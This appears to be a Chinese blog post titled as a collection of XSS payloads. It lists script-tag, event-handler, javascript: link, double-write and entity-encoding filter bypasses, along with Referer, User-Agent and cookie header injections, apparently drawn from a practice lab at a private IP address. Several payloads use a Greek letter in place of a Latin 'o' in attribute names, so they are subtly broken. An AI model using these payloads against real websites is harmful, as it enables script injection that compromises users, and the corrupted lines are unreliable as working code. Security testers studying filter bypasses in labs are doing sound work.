XSS语句大全

很乱

1.<script>alert(1)</script>

2、"><script>alert(1)</script>

3、' οnchange='alert(1)' //                                          html 事件 onchange-当元素改变时运行脚本

4、"οnchange='alert(1)' //                                          html 事件

5、"><a href=" javascript:alert(1)"                              html  a标签

6、“><a HREF=”javascript:alert(1)”                              html a标签的大小写转换

7、“><scrscriptipt>alert(1)</scrscriptipt>                   双写绕过

8、Javascr&#13ipt:alert(1)                                             &#13  13是回车

9、Javascr&#13ipt:alert(‘http://’)

10、t_sort="type="button" οnfοcus="alert(1)               onfocus-当窗口获得焦点时运行脚本

11、Referer传" type="button" οnclick="alert(1)

12、User agent传 "type="button" οnclick="alert(1)

13、Cookies传 user=" οnclick="alert(1)" type="text"

14、<img src=x οnlοad=alert(1)>

<script>alert('XSS')</script>

"><script>alert("XSS")</script>

' οnfοcus=javascript:alert('xss') >
' οnfοcus=javascript:alert('xss')//
' οnclick=javascript:alert('xss')//
" οnclick=javascript:alert('xss')//

"> <a href=javascript:alert('xss')>xss</a>//

"> <ScripT>alert('1')</ScRipT>

"> <a hrehreff=javascrscriptipt:alert('xss')>xss</a>//

"><sscriptcript>alert('xss')</sscriptcript>

javascript:alert(‘xss’) 转化为实体字符:&#32;&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#120;&#115;&#115;&#39;&#41;

burp放包 Referer: " οnclick=javascript:alert(1) type="text"

hackbar:user-agent  referer cookie  " οnclick=javascript:alert(1) type="text"

' http://192.168.100.152:88/level1.php?name="><a href="javascript:alert(/xss/)">xss '

<a%0dhref='javas%0acript:alert(1)'>xss

<img%0asrc=1%0dοnerrοr=alert(1)>

  • 11
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值